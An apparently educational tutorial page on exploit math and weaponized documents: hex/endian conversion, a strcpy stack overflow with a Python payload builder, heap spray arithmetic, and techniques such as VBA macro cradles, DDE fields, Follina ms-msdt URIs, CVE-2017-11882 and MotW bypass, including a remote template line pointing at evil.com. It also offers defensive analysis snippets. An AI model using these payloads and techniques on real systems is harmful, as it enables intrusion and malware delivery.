Deep Dive: The World of Exploits — Zero-Click & Document Exploits

// 02 — The Hacker's Math ⏱ 8 min · Intermediate

Calculations Behind Every Exploit

Every exploit is a math problem. Before any code is written, the attacker must calculate: how many bytes to write, what address to overwrite, how to convert a URL into hex, how to align shellcode in memory, and how to translate between decimal, hexadecimal, and binary. This section breaks down every calculation step-by-step so you see exactly how the numbers work.

Hexadecimal — The Hacker's Number System

Computers work in binary (base-2), humans work in decimal (base-10), but hackers work in hexadecimal (base-16). Why? Because one hex digit maps perfectly to 4 binary bits, and two hex digits map to exactly one byte (8 bits). This makes it trivial to read and write raw memory contents.

Base Conversion Reference
  Decimal 0-15 = Hex 0-F = Binary 0000-1111
  1 hex digit  = 4 bits (a "nibble")
  2 hex digits = 8 bits  = 1 byte
  4 hex digits = 16 bits = 1 word (on x86)
  8 hex digits = 32 bits = 1 DWORD = 1 memory address (32-bit x86)

Example: Converting the EIP Target Address
  Target address: 0x0C0C0C0C
  Hex: 0C 0C 0C 0C
  Dec: 12 12 12 12 (each byte)
  Full decimal:
    0x0C0C0C0C = 0×16⁷ + 12×16⁶ + 0×16⁵ + 12×16⁴ + 0×16³ + 12×16² + 0×16¹ + 12×16⁰
               = 12×16,777,216 + 12×65,536 + 12×256 + 12×1
               = 201,326,592 + 786,432 + 3,072 + 12
               = 202,116,108 decimal ≈ 192.75 MB into the address space
  This is why heap spray works: if the heap starts near 64 MB, spraying about 200 MB of NOP sled copies covers the address at roughly 192 MB.
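The positional expansion can be checked mechanically. The sketch below is only a verification aid; the helper name `expand_hex` is made up for this example and is not part of any tool mentioned in the text.

```python
def expand_hex(value: int, digits: int = 8) -> list[tuple[int, int, int]]:
    """Return (digit, power, contribution) per hex digit, most significant first."""
    terms = []
    for power in range(digits - 1, -1, -1):
        digit = (value >> (4 * power)) & 0xF      # isolate one 4-bit nibble
        terms.append((digit, power, digit * 16 ** power))
    return terms


terms = expand_hex(0x0C0C0C0C)
total = sum(contribution for _, _, contribution in terms)

for digit, power, contribution in terms:
    print(f"{digit:2d} x 16^{power} = {contribution:,}")
print(f"total = {total:,} bytes = {total / 2**20:.2f} MB")
```

Only the even powers contribute, because the digit 0 sits at every odd power in 0C 0C 0C 0C.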

Little-Endian Byte Order (x86 CPUs)
  x86 stores multi-byte values in little-endian order (least significant byte first).
  Address 0xDEADBEEF is stored in memory as: EF BE AD DE
  Address 0x0C0C0C0C is stored in memory as: 0C 0C 0C 0C (a palindrome, the same either way)
  Python: struct.pack("<I", 0xDEADBEEF) → b"\xef\xbe\xad\xde"
  Attackers favor 0x0C0C0C0C partly because it reads the same forwards and backwards, so there is no endian confusion. A second reason is that the byte pair 0C 0C decodes on x86 as "or al, 0x0C", an effectively harmless instruction, so the same bytes can act as both address and sled.
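The byte-order rule is easy to confirm with Python's standard `struct` module. This is a small sketch; the two wrapper function names are invented for illustration.

```python
import struct


def to_little_endian(value: int) -> bytes:
    """Pack a 32-bit unsigned value the way x86 stores it in memory."""
    return struct.pack("<I", value)


def to_big_endian(value: int) -> bytes:
    """Pack the same value in network (big-endian) order for comparison."""
    return struct.pack(">I", value)


for address in (0xDEADBEEF, 0x0C0C0C0C):
    le = to_little_endian(address)
    be = to_big_endian(address)
    print(f"0x{address:08X}  little-endian={le.hex(' ')}  big-endian={be.hex(' ')}")
```

For 0x0C0C0C0C both orders produce the same four bytes, which is the palindrome property described above.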

The Buffer Overflow — Calculated Byte by Byte

A buffer overflow isn't random — it's precisely calculated. The attacker must determine the exact number of bytes between the start of the buffer and the saved EIP (return address) on the stack. This offset determines how much "junk" padding to write before placing the hijacked address.

The Vulnerable C Code — Where the Bug Lives

vulnerable_parser.c — the root cause of the exploit

// An illustrative vulnerable function of the kind found inside a PDF reader / document parser.
// The programmer allocated a fixed-size buffer but used an UNSAFE copy function.

void parse_document_title(char *incoming_doc_data) {
    char title_buffer[50];  // The application allocates exactly 50 bytes for the title
    
    // VULNERABILITY: strcpy() does NOT check the length of incoming data!
    // If the attacker puts 200 bytes in the document's title field,
    // it violently overflows title_buffer, spilling into adjacent memory
    // and overwriting the saved EBP and saved EIP on the stack.
    strcpy(title_buffer, incoming_doc_data);  // ← THE BUG
}

// WHY THIS IS DANGEROUS:
// title_buffer sits on the stack. Right after it (at higher addresses) are:
//   - Saved EBP (4 bytes): the previous function's base pointer
//   - Saved EIP (4 bytes): the RETURN ADDRESS (where the CPU goes next)
// Ignoring compiler alignment padding, writing 50 + 4 + 4 = 58 bytes reaches
// and overwrites the saved EIP. With padding the count is slightly higher.

// SAFER ALTERNATIVE:
//   strncpy(title_buffer, incoming_doc_data, sizeof(title_buffer) - 1);
//   title_buffer[sizeof(title_buffer) - 1] = '\0';
// strncpy limits the copy to 49 bytes but does not null-terminate when the
// source is longer, so the terminator must be written explicitly.

Offset Calculation: How Many Bytes to EIP?
  Stack layout (low address → high address):
    [title_buffer: 50 bytes] [alignment padding: 2 bytes] [saved EBP: 4 bytes] [saved EIP: 4 bytes]
  Offset to EIP = buffer_size + padding + saved_EBP
  Offset = 50 + 2 + 4 = 56 bytes
  The compiler may add 2 bytes of padding to align the stack to a 4-byte boundary (50 is not divisible by 4, 52 is).
  So the attacker writes: 56 bytes of junk ("A"×56) + 4 bytes EIP + shellcode
  Total minimum payload: 56 + 4 + 342 = 402 bytes
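The layout arithmetic can be written down as a tiny model. This is a sketch under the same simplifying assumptions as the text (one local buffer, padding up to a 4-byte boundary, a 4-byte saved frame pointer); real compilers may reorder locals, use different alignment, or insert stack canaries, so the result always has to be confirmed in a debugger. The function names are hypothetical.

```python
def align_up(size: int, boundary: int = 4) -> int:
    """Round size up to the next multiple of boundary."""
    return (size + boundary - 1) // boundary * boundary


def offset_to_return_address(buffer_size: int,
                             saved_fp_size: int = 4,
                             boundary: int = 4) -> int:
    """Bytes between the start of the buffer and the saved return address."""
    padding = align_up(buffer_size, boundary) - buffer_size
    return buffer_size + padding + saved_fp_size


print(align_up(50))                      # 52: the buffer rounded to a 4-byte boundary
print(offset_to_return_address(50))      # 56: 50 buffer + 2 padding + 4 saved EBP
```

The same model also shows why the fix matters: a bounded copy of at most 49 bytes never gets near offset 56.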

The Exploit Tool — Python Precision

overflow_tool.py — the exploit builder

# ═══════════════════════════════════════════════════
# THE TOOL PROVISIONING LOGIC
# This is how an attacker builds the overflow payload.
# Every byte is calculated and placed precisely.
# ═══════════════════════════════════════════════════

from struct import pack

# ── Configuration (from fuzzing/debugging) ──
# NOTE: this is a separate example from the 50-byte title_buffer above.
buffer_limit = 64              # Offset from the start of the buffer to saved EIP (found by reversing the binary)
target_eip   = pack("<I", 0xDEADBEEF)  # Placeholder address 0xDEADBEEF, packed little-endian: b"\xef\xbe\xad\xde"

# THE MATH:
# buffer_limit = 64 bytes is the distance from the buffer start to the saved EIP.
# It must already include the buffer itself, any alignment padding, and the
# 4-byte saved EBP (see the offset calculation above).
# The next 4 bytes on the stack are the saved EIP (return address).
# By writing 64 + 4 = 68 bytes, we overwrite EIP with our target.

# 1. Fill the buffer with 'A's (0x41 in hex)
padding = b"A" * buffer_limit
# Result: b"AAAAAAAAAA...AAAA" (64 bytes)
# In hex: 41 41 41 41 41 41 41 41 ... (64 times)

# 2. Append the target return address
# Because we filled EXACTLY 64 bytes, these next 4 bytes
# spill over the buffer boundary and overwrite saved EIP
overflow = padding + target_eip
# Result: b"AAAA...AAAA\xef\xbe\xad\xde" (68 bytes)
# Memory: [41 41 41 41 ...×64... 41 41 41 41] [EF BE AD DE]
#          ← buffer (filled) →                ← EIP (hijacked!) →

# 3. Add the shellcode (the actual malicious instructions)
shellcode = b"\x90\x90\x90\x90"  # NOP sled (0x90 = "do nothing")
shellcode += b"\x31\xc0"         # xor eax, eax (clear register)
shellcode += b"\x50"             # push eax (push NULL onto stack)
shellcode += b"\x68\x2f\x2f\x73\x68"  # push "//sh" (the command to run)
# ... more instructions to download & execute payload ...

# 4. ASSEMBLE THE FINAL ATTACK STRING
final_attack_string = overflow + shellcode

print(f"Buffer size:  {buffer_limit} bytes (junk padding)")
print(f"EIP target:   {target_eip.hex()} → 0xDEADBEEF")
print(f"Shellcode:    {len(shellcode)} bytes")
print(f"Total attack: {len(final_attack_string)} bytes")
print()
print(f"Layout in memory:")
print(f"[{'A'*8}...×{buffer_limit}...{'A'*8}] [EFBEADDE] [9090...shellcode]")
print(f" ←── {buffer_limit} bytes (junk) ──→  ← 4B EIP → ← {len(shellcode)}B code →")

Visual: What This Generates in Memory
  [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] ← bytes 0-15 (AAAA... junk)
  [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] ← bytes 16-31
  [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] ← bytes 32-47
  [41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41] ← bytes 48-63 (end of buffer)
  [EF BE AD DE] ← bytes 64-67 = EIP OVERWRITE (0xDEADBEEF)
  [90 90 90 90 31 C0 50 68 2F 2F 73 68 ...] ← bytes 68+ = SHELLCODE

Converting a URL to Shellcode Hex

The shellcode needs to contain the URL of the second-stage payload as raw bytes. In source form, the attacker writes every character of the URL as a \xNN hex escape taken from the ASCII table. This is only a notation: the resulting bytes are identical to the plain-text string, so a string-based scanner still sees the URL unless the payload is additionally encoded or encrypted.

ASCII → Hex Conversion Table (URL Characters)
  'h' = 0x68 | 't' = 0x74 | 'p' = 0x70 | 's' = 0x73
  ':' = 0x3A | '/' = 0x2F | '.' = 0x2E | 'e' = 0x65
  'x' = 0x78 | 'u' = 0x75 | 'y' = 0x79 | 'i' = 0x69
  Every printable ASCII character has a fixed hex value: A=0x41, Z=0x5A, a=0x61, z=0x7A, 0=0x30, 9=0x39

url_to_shellcode.py — converting strings to exploit format

# ═══════════════════════════════════════════════════
# A hacker uses Python to turn a URL into hex notation for the shellcode.
# Note: \x## is only a way of writing bytes; the bytes themselves are plain ASCII.
# ═══════════════════════════════════════════════════

url = "https://putty.exe"

# Convert each character to its \x## hex representation
hex_url = "".join(["\\x%02x" % ord(c) for c in url])
print(f"Original URL:  {url}")
print(f"Hex Encoded:   {hex_url}")
print()

# Step-by-step: what ord() and %02x do for each character:
#   'h' → ord('h') = 104 → hex(104) = 0x68 → "\x68"
#   't' → ord('t') = 116 → hex(116) = 0x74 → "\x74"
#   't' → ord('t') = 116 → hex(116) = 0x74 → "\x74"
#   'p' → ord('p') = 112 → hex(112) = 0x70 → "\x70"
#   's' → ord('s') = 115 → hex(115) = 0x73 → "\x73"
#   ':' → ord(':') =  58 → hex(58)  = 0x3a → "\x3a"
#   '/' → ord('/') =  47 → hex(47)  = 0x2f → "\x2f"
#   '/' → ord('/') =  47 → hex(47)  = 0x2f → "\x2f"
#   ... and so on for every character

# RESULT for "https://putty.exe":
# \x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x75\x74\x74\x79\x2e\x65\x78\x65

# Now build the shellcode: machine code + the hex URL string
shellcode  = b"\x31\xc0"      # xor eax, eax    (clear EAX register)
shellcode += b"\x50"          # push eax        (push NULL terminator)
shellcode += b"\x68"          # push DWORD      (push 4 bytes of URL onto stack)
shellcode += url[-4:].encode()  # ".exe" as raw bytes
shellcode += b"\x89\xe3"      # mov ebx, esp    (EBX now points to URL string)
shellcode += b"\x50"          # push eax        (more stack setup...)
shellcode += b"\x53"          # push ebx        (push URL pointer as arg)

print(f"Shellcode bytes: {shellcode.hex()}")
print(f"Shellcode size:  {len(shellcode)} bytes")
print()
print("Raw bytes as hex:    31c050682e65786589e35053")
print("What it ACTUALLY is: xor eax;push;push '.exe';mov ebx,esp;push;push")
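From the defender's side, it is worth checking what a string scanner actually sees in such bytes. The sketch below compares the hex-escaped form with the plain string and runs a minimal `strings`-style scan over the 12 bytes printed above. The helper `printable_strings` is a hypothetical stand-in for a real scanner, assuming a minimum run length of 4 printable characters.

```python
import re


def printable_strings(data: bytes, min_len: int = 4) -> list[bytes]:
    """Return runs of printable ASCII at least min_len long, like the `strings` tool."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


escaped = b"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x75\x74\x74\x79\x2e\x65\x78\x65"
plain = b"https://putty.exe"
print(escaped == plain)                  # the two literals are the same bytes

blob = bytes.fromhex("31c050682e65786589e35053")
print(printable_strings(blob))           # the pushed ".exe" is still visible
```

The opcode bytes 0x50 and 0x68 happen to be printable ("P" and "h"), so the scan reports the run `Ph.exe`: the file extension is not hidden by writing it in hex.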

Unicode Encoding Math (for JavaScript Heap Spray)
  JavaScript's %uXXXX escape encodes one 16-bit character, so each pair of raw bytes is written with the two bytes swapped:
  Raw bytes: FC E8 → swap → E8 FC → JavaScript: %ue8fc
  Raw bytes: 82 00 → swap → 00 82 → JavaScript: %u0082
  Raw bytes: 00 00 → swap → 00 00 → JavaScript: %u0000
  Full: FC E8 82 00 00 00 → "%ue8fc%u0082%u0000"
  The swap is needed because unescape() turns each %uXXXX into a 16-bit value, and x86 stores that value in memory in little-endian order (low byte first).
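When analyzing a suspicious script, the reverse direction is the useful one: turning a `%u`-escaped string back into the raw bytes it represents. A minimal decoder sketch follows; the function name `decode_percent_u` is an assumption for this example, and it deliberately ignores anything that is not a `%uXXXX` escape.

```python
import re
import struct


def decode_percent_u(escaped: str) -> bytes:
    """Decode %uXXXX escapes into the bytes they occupy in little-endian memory."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", escaped)
    # Each escape is one 16-bit code unit; "<H" writes the low byte first.
    return b"".join(struct.pack("<H", int(unit, 16)) for unit in units)


raw = decode_percent_u("%ue8fc%u0082%u0000")
print(raw.hex(" "))
```

Running it on the example from the table recovers the original byte order, FC E8 82 00 00 00.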

Heap Spray — The Memory Math

Heap spraying is pure arithmetic. The attacker must calculate exactly how large each spray block is, how many copies are needed, and verify that the target address (0x0C0C0C0C) falls inside the sprayed region.

Spray Block Size Calculation
  Target block size: 0x100000 hex = 1,048,576 bytes = 1 MB
  Shellcode size: 342 bytes
  NOP sled size: 1,048,576 - 342 = 1,048,234 bytes of NOP sled
  NOP sled % of block: 1,048,234 / 1,048,576 = 99.97% is landing zone
  Any jump into this 1 MB block has a 99.97% chance of hitting the NOP sled → sliding to shellcode

Total Spray Coverage
  Number of spray blocks: 200 copies (JavaScript array indices 0-199)
  Total sprayed memory: 200 × 1,048,576 = 209,715,200 bytes ≈ 200 MB
  Heap start address (typical): ~0x04000000 (64 MB)
  Heap end after spray: ~0x04000000 + 0x0C800000 = ~0x10800000 (264 MB)
  Target address 0x0C0C0C0C ≈ 192 MB, which is INSIDE the sprayed region ✓
  The spray covers addresses from ~64 MB to ~264 MB, so address 192 MB (0x0C0C0C0C) falls well inside that range.
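The block-size and coverage figures above can be re-derived in a few lines. This sketch uses an idealized model: it assumes the heap starts at exactly 0x04000000 and that the blocks are laid out contiguously, neither of which is guaranteed on a system with ASLR and a hardened allocator. All constant names are chosen for this example.

```python
BLOCK_SIZE = 0x100000        # 1 MB per spray block
BLOCK_COUNT = 200
SHELLCODE_SIZE = 342
HEAP_START = 0x04000000      # assumed heap base from the text (~64 MB)
TARGET = 0x0C0C0C0C

sled_size = BLOCK_SIZE - SHELLCODE_SIZE
sled_fraction = sled_size / BLOCK_SIZE
total_sprayed = BLOCK_SIZE * BLOCK_COUNT
heap_end = HEAP_START + total_sprayed
covered = HEAP_START <= TARGET < heap_end

print(f"sled per block : {sled_size:,} bytes ({sled_fraction:.2%})")
print(f"total sprayed  : {total_sprayed:,} bytes")
print(f"sprayed range  : 0x{HEAP_START:08X} .. 0x{heap_end:08X}")
print(f"target covered : {covered}")
```

Changing `HEAP_START` or `BLOCK_COUNT` shows how quickly the target drops out of the covered range, which is the reason address randomization undermines this technique.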

NOP Sled Expansion Math (the while loop)
  Initial: junk_code = "%u9090%u9090" → 2 characters after unescape() (4 bytes, since each character is 16 bits)
  Iteration 1: junk_code += junk_code → 4 characters
  Iteration 2: 4 + 4 = 8 characters
  Iteration 3: 8 + 8 = 16 characters
  Iteration 4: 16 + 16 = 32 characters (doubles each time: exponential growth)
  Iteration 15: 65,536 characters
  Iteration 16: 131,072 characters
  Iteration 17: 262,144 characters = 0x40000 → LOOP STOPS (length ≥ 0x40000 = 262,144)
  Just 17 doublings take the string from 2 characters to 262,144 characters (512 KB of memory at 2 bytes per character), assuming the loop compares the string's .length against 0x40000. That is the power of exponential doubling.
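The iteration count depends on the starting length and on whether lengths are counted in characters or bytes, so it helps to simulate the doubling rather than count by hand. A minimal sketch, with `doublings_until` as a made-up helper name; it counts in whatever unit the start and limit are given in.

```python
def doublings_until(start: int, limit: int) -> int:
    """Count how many times a length must double before it reaches limit."""
    length, iterations = start, 0
    while length < limit:
        length += length          # same effect as junk_code += junk_code
        iterations += 1
    return iterations


# Counting in characters: 2 characters grow to 0x40000 characters.
print(doublings_until(2, 0x40000))
# Counting in bytes: 4 bytes grow to 0x40000 bytes.
print(doublings_until(4, 0x40000))
```

Starting from 2 units the loop needs 17 doublings to reach 0x40000; starting from 4 it needs 16.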

PDF Structure — Object Numbers & Cross-Reference Math

A PDF file is a structured database of numbered objects. Each object has a generation number (usually 0) and an offset (the byte position from the start of the file where that object begins). The cross-reference table (xref) maps object numbers to byte offsets so the PDF reader can jump directly to any object.

xref Offset Calculation
  %PDF-1.4\n = 9 bytes (header: 8 characters plus the newline)
  Object 1 starts at: byte 9 (immediately after the header, counting from byte 0)
  Object 1 content: "1 0 obj\n<< /Type /Catalog ... >>\nendobj\n\n" = ~90 bytes
  Object 2 starts at: 9 + 90 = byte 99
  Object 2 content: "2 0 obj\n<< /Type /Pages ... >>\nendobj\n\n" = ~53 bytes
  Object 3 starts at: 99 + 53 = byte 152
  Object 4 starts at: 152 + 68 = byte 220
  Each xref entry is exactly 20 bytes (10-digit offset + space + 5-digit gen + space + f/n + \r\n)
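The running-sum logic behind the xref table is short enough to sketch directly. The example below uses two small, harmless placeholder objects (their exact contents are assumptions, so the offsets differ from the approximate sizes quoted above) and formats each offset as a 20-byte xref entry.

```python
HEADER = b"%PDF-1.4\n"
OBJECTS = [
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
]


def xref_entries(header: bytes, objects: list[bytes]) -> tuple[list[int], list[bytes]]:
    """Return each object's byte offset and the matching 20-byte xref lines."""
    offsets = []
    position = len(header)                 # the first object starts right after the header
    for body in objects:
        offsets.append(position)
        position += len(body)
    entries = [b"0000000000 65535 f\r\n"]  # entry 0 is always the free-list head
    entries += [b"%010d 00000 n\r\n" % offset for offset in offsets]
    return offsets, entries


offsets, entries = xref_entries(HEADER, OBJECTS)
for offset, entry in zip(offsets, entries[1:]):
    print(offset, entry)
```

Because every entry has a fixed width, a reader can find the entry for object N by simple multiplication instead of scanning the table.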

🧮 Why This Math Matters

Every number in an exploit is calculated, not guessed. The buffer size comes from reverse-engineering the target binary. The EIP offset comes from cyclic pattern fuzzing. The heap spray address comes from memory layout analysis. The xref offsets come from counting bytes in the PDF file. If any single number is wrong by even 1 byte, the exploit crashes the target instead of compromising it. This is why exploit development is considered one of the most difficult skills in cybersecurity — it's applied mathematics at the machine code level.

🔢 Exploit Math Calculator — Try It Live

Computers store everything as numbers, but hackers, CPUs, and network protocols each prefer different formats.

Decimal (base-10): Normal human numbers, digits 0-9. Example: 255 means two hundred fifty-five.

Hexadecimal (base-16): Uses 0-9 plus A-F. Each hex digit = 4 bits. 0xFF = 255. Memory addresses and exploit payloads are written in hex.

Binary (base-2): Only 0 and 1, exactly how CPUs think. Each digit is one bit. 8 bits = 1 byte. 11111111 = 255.

Octal (base-8): Digits 0-7. Used in Linux file permissions (chmod 755) and some legacy systems. 0377 = 255.

In a buffer overflow, the attacker must write exactly the right number of bytes to overwrite the return address (EIP). Too few = nothing happens. Too many = crash. This calculator finds the precise offset.

Buffer Size (bytes): Size of the vulnerable buffer, i.e. how much data the program allocated. Overflow starts after this many bytes.

Saved EBP Size (bytes): The frame pointer stored on the stack. Usually 4 bytes (32-bit) or 8 bytes (64-bit). It must be overwritten to reach EIP.

Extra Padding (bytes): Some compilers add alignment padding between buffer and EBP. Check with a debugger; usually 0, 4, or 8 bytes.

Target EIP (hex): The address you want the CPU to jump to, typically a heap spray landing zone like 0x0C0C0C0C or a JMP ESP gadget.

CPUs store multi-byte values in different orders. x86 uses little-endian (least significant byte first), while networks use big-endian. When building exploits, you must write addresses in the correct byte order or the CPU reads them wrong.

Address / Hex Value: Enter a memory address or any hex value. Example: DEADBEEF is a common test value, 0C0C0C0C is a heap spray target.

Byte Width: How many bytes the value occupies. 4 = 32-bit address (x86), 8 = 64-bit address (x64). Pads with zeros if needed.

Heap spraying floods the process memory with repeated copies of your payload. When the exploited code jumps to a "random" address, the huge NOP sled catches the CPU and slides it into shellcode. More spray = higher chance of landing.

Spray Block Size (hex): Size of each memory chunk in hex. 100000 = 1 MB. Larger blocks = bigger landing zone per allocation.

Number of Blocks: How many copies to spray. 200 blocks × 1 MB = 200 MB of heap controlled. More blocks = more coverage.

NOP Sled per Block (bytes): NOP (0x90) = "do nothing" instruction. The sled is a huge runway: land anywhere on it and the CPU slides right into shellcode.

Shellcode Size (bytes): The actual malicious code that runs (reverse shell, downloader, etc.). Typically 200-800 bytes. Placed after the NOP sled.

// 05 — Weaponized Documents ⏱ 6 min · Intermediate

Weaponized Documents

Document exploits turn familiar file formats — Word (.docx), Excel (.xlsx), PDF (.pdf), RTF (.rtf), and PowerPoint (.pptx) — into weapons. Because users trust documents (they receive invoices, resumes, contracts, and reports daily), weaponized documents remain one of the most effective initial access vectors in real-world attacks. The attacker crafts a file that looks completely normal when opened — it displays the expected content (an invoice, a report, a chart). But hidden inside the file's internal structure are malicious payloads that execute code the moment the application parses them.

Document formats are inherently complex. The PDF specification alone is over 1,000 pages. Microsoft's Office Open XML format contains dozens of XML namespaces with hundreds of features. This complexity means there are thousands of code paths in the parser — and each code path is a potential vulnerability. Below are the eight primary techniques attackers use to weaponize documents.

The Major Attack Surfaces

📊

VBA Macros

What it is: Visual Basic for Applications (VBA) is a full programming language embedded inside Microsoft Office. Macros are VBA programs stored inside .docm, .xlsm, or .pptm files. When a user clicks "Enable Content," the macro runs with the same privileges as the Office application.

How attackers use it: The attacker writes a VBA macro that uses the Shell() function or WScript.Shell to execute system commands — typically downloading a second-stage payload from a remote server using PowerShell (powershell -e [base64 encoded command]). The macro auto-executes on open via Auto_Open() or Document_Open() event handlers.

Example generation: A macro containing Sub Auto_Open() / Shell "powershell -e JABjAD0..." / End Sub executes the moment the user clicks "Enable Content." The base64 string decodes to a PowerShell cradle that downloads a Cobalt Strike beacon from the attacker's server.
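For an analyst, the first step with such a macro is to decode the argument and read what it does. PowerShell's encoded-command argument is Base64 over UTF-16LE text, so the standard library is enough. A minimal sketch: the function name is hypothetical, and the sample string completes the visible prefix JABjAD0 with a trailing `A` purely so that it forms a whole Base64 group (that last character is an assumption, not part of the original sample).

```python
import base64


def decode_powershell_encoded(argument: str) -> str:
    """Decode the Base64 argument of `powershell -e` into readable text."""
    raw = base64.b64decode(argument)
    return raw.decode("utf-16-le")     # PowerShell encodes the command as UTF-16LE


print(decode_powershell_encoded("JABjAD0A"))
```

The prefix decodes to `$c=`, the start of a variable assignment, which is why so many encoded PowerShell commands begin with the characters `JAB`.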

🔗

OLE Objects

What it is: Object Linking and Embedding (OLE) allows embedding foreign objects inside a document — Excel sheets inside Word, PDF files inside PowerPoint, or even executable programs disguised with document icons. The embedded object is stored as a binary blob inside the document file.

How attackers use it: The attacker embeds a malicious OLE object — often targeting the archaic Microsoft Equation Editor (EQNEDT32.EXE), which has a known buffer overflow (CVE-2017-11882). When the document renders the embedded equation, EQNEDT32.EXE parses the OLE data, hits the overflow, and the attacker's shellcode executes. No "Enable Content" prompt appears because this is not a macro attack — it exploits the rendering engine itself.

Example generation: The OLE object contains a crafted equation binary where the font name field exceeds 48 bytes, overflowing EQNEDT32.EXE's stack buffer and overwriting the return address with a pointer to the embedded shellcode.

🌐

Remote Templates

What it is: Word and Excel documents can reference external template files via a URL. The template URL is stored in the document's relationship file (word/_rels/document.xml.rels inside the .docx ZIP archive). When the document opens, Office fetches the remote template automatically.

How attackers use it: The initial document contains zero malicious content — it passes every antivirus scan. But when opened, it fetches a remote .dotm template from the attacker's server. That template contains the actual malicious macro or exploit. This two-stage approach evades email security scanners because the malicious payload never touches the email gateway.

Example generation: The attacker modifies document.xml.rels to include Target="http://evil.com/template.dotm" with TargetMode="External". The .docx file itself is completely clean. The payload only exists on the remote server.
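Because the reference is stored as plain XML inside the ZIP container, it can be listed without opening the document in Office. The sketch below scans every `.rels` part of an OOXML file for relationships marked `TargetMode="External"`. The function name `external_targets` is invented for this example, and an external relationship is not malicious by itself (ordinary hyperlinks use the same mechanism), so the output is a triage list rather than a verdict.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Namespace used by relationship parts in the Open Packaging Conventions.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_targets(document_bytes: bytes) -> list[tuple[str, str, str]]:
    """Return (part name, relationship type, target) for every external relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(document_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found
```

Typical usage is `external_targets(open(path, "rb").read())`, followed by a closer look at any target whose relationship type ends in `attachedTemplate` or `oleObject`.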

⚡

DDE / Field Codes

What it is: Dynamic Data Exchange (DDE) is a legacy Windows inter-process communication protocol. Word and Excel support DDE field codes that can pull data from other applications. The field code { DDEAUTO "cmd" "/c calc.exe" } tells Word to execute the command via DDE.

How attackers use it: The attacker inserts a DDE field code into a .docx file. When the user opens the document, Word prompts "This document contains links to other data sources. Do you want to update?" If the user clicks "Yes" (which most users do reflexively), the DDE command executes — typically launching PowerShell to download malware. This works even with macros completely disabled.

Example generation: Insert field code: { DDEAUTO c:\\windows\\system32\\cmd "/k powershell -e [payload]" }. The field appears as "!Unexpected End of Formula" in the document text, which the attacker hides by formatting the font as white, 1pt size.

📐

Equation Editor (CVE-2017-11882)

What it is: EQNEDT32.EXE is Microsoft's Equation Editor — a 17-year-old component compiled without any stack protections (no ASLR, no DEP, no stack canaries). It processes OLE objects embedded in Office documents when they contain mathematical equations.

How attackers use it: A specially crafted OLE equation object contains a font name that exceeds the 48-byte buffer in EQNEDT32.EXE. The overflow overwrites the saved return address on the stack. When the function returns, it jumps to the attacker's shellcode instead of the legitimate caller. Because EQNEDT32.EXE has no ASLR, the attacker knows exactly where the buffer is in memory.

Example generation: The OLE object's font record: [48 bytes of font name] [4 bytes: return address → shellcode] [shellcode bytes]. The return address is hardcoded to 0x00402114 (a known "call eax" gadget in EQNEDT32.EXE). Still actively exploited today.

🖨️

Follina (CVE-2022-30190)

What it is: A vulnerability in Microsoft's Support Diagnostic Tool (MSDT). Documents can invoke MSDT via the ms-msdt: protocol URI handler. The diagnostic tool accepts command-line arguments that include PowerShell code, which it executes with the user's privileges.

How attackers use it: The attacker creates a .docx file with an external OLE reference pointing to an attacker-controlled HTML page. When Word fetches this page, the HTML contains JavaScript that redirects to a ms-msdt: URI with embedded PowerShell commands. MSDT launches and executes the commands. No macros, no "Enable Content" prompt — not even Protected View stops it in some configurations.

Example generation: The ms-msdt URI: ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? /../../$(powershell -e [base64])/..". The PowerShell payload encoded in base64 downloads and executes a reverse shell.

💿

MotW Bypass (ISO/IMG Containers)

What it is: Mark-of-the-Web (MotW) is a Windows security feature that tags files downloaded from the internet with a Zone.Identifier NTFS alternate data stream. Office blocks macros from MotW-tagged files. But ISO/IMG disk image files and ZIP archives can strip MotW from files inside them.

How attackers use it: The attacker packages a malicious .docm or .lnk file inside an ISO disk image. When the victim opens the ISO, Windows mounts it as a virtual drive. Files extracted from the mounted drive do not inherit the MotW tag, so macro-blocking and SmartScreen warnings are bypassed. This became the dominant delivery technique in 2022-2023 after Microsoft blocked internet-sourced macros by default.

Example generation: Attacker creates Invoice.iso containing Invoice.docm + a shortcut (.lnk) that auto-runs PowerShell. The ISO bypasses MotW → the .lnk runs without SmartScreen interception.
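The MotW tag itself is a small INI-style text stream, which makes it easy to inspect during triage. The sketch below parses the text of a Zone.Identifier stream and returns the zone number (3 means the Internet zone). The function name is hypothetical, and reading the stream from disk (on Windows/NTFS, by opening the file path with `:Zone.Identifier` appended) is assumed rather than shown.

```python
import configparser
from typing import Optional


def parse_zone_identifier(text: str) -> Optional[int]:
    """Return the ZoneId from Zone.Identifier stream text, or None if absent."""
    # Interpolation is disabled because HostUrl values may contain '%' characters.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    if parser.has_option("ZoneTransfer", "ZoneId"):
        return parser.getint("ZoneTransfer", "ZoneId")
    return None


sample = "[ZoneTransfer]\nZoneId=3\nHostUrl=https://example.invalid/Invoice%20March.iso\n"
print(parse_zone_identifier(sample))
```

A file that arrived from the internet but returns `None` here is worth a second look, since a missing tag is exactly the condition this delivery technique relies on.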

📓

OneNote Attacks (.one Files)

What it is: Microsoft OneNote allows embedding arbitrary file attachments inside .one notebook files. Unlike Word/Excel, OneNote did not block macros or restrict executable content — it simply showed a generic "double-click to open attachment" prompt.

